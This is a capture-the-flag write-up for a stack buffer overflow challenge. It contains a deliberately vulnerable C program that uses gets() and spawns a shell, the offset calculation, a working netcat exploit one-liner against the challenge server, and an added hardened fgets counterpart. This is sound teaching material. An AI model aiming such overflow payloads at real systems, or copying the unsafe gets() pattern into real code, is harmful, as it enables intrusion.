#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);    // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}

int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

How to Exploit

  1. Overwrite key, which sits just past ret (the return address), with 0xcafebabe. Its distance from buf (the overflowme array) is 0x2c+0x8 = 0x34.
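
For contrast, a hardened counterpart of func() with gets() replaced by a bounded read, run against constructed input shaped like the one this writeup uses. This is an added example, not part of the original challenge or post; read_line_bounded, func_hardened, run_sample and struct result are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

/* Bounded line read: NUL-terminates buf, sets *truncated if excess was dropped. */
size_t read_line_bounded(FILE *in, char *buf, size_t cap, int *truncated)
{
    *truncated = 0;
    buf[0] = '\0';                           /* requires cap >= 1 */
    if (fgets(buf, (int)cap, in) == NULL)
        return 0;
    size_t n = strcspn(buf, "\n");
    if (buf[n] == '\n') {
        buf[n] = '\0';                       /* whole line fit */
    } else if (n == cap - 1) {               /* buffer full: drain the rest */
        for (int c; (c = fgetc(in)) != EOF && c != '\n'; )
            *truncated = 1;
    }
    return n;
}

struct result { int key_matched; size_t stored; int truncated; };
/* Hardened counterpart of func(): same 32-byte buffer, bounded read. */
struct result func_hardened(FILE *in, unsigned int key)
{
    char overflowme[32];
    struct result r;
    r.stored = read_line_bounded(in, overflowme, sizeof overflowme, &r.truncated);
    r.key_matched = (key == 0xcafebabeu);    /* checked after the read, as in func() */
    return r;
}

/* Constructed input shaped like the page's: 0x34 filler bytes + BE BA FE CA. */
struct result run_sample(void)
{
    struct result r = { -1, 0, 0 };
    FILE *f = tmpfile();
    if (f == NULL)
        return r;
    fprintf(f, "%0*d", 0x34, 0);             /* 0x34 filler bytes ('0') */
    fputs("\xbe\xba\xfe\xca\n", f);
    rewind(f);
    r = func_hardened(f, 0xdeadbeefu);
    fclose(f);
    return r;
}

int main(void)
{
    return run_sample().key_matched != 0;    /* exit status 0: key was not overwritten */
}
```

Only 31 bytes reach the buffer, the remainder of the line is discarded, and key keeps the value main() passed in.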

Exploit Code

baek@ubuntu:~/Downloads$ (python -c 'print "A"*0x34+"\xbe\xba\xfe\xca"';cat)| nc pwnable.kr 9000
cat flag

Capture The Flag
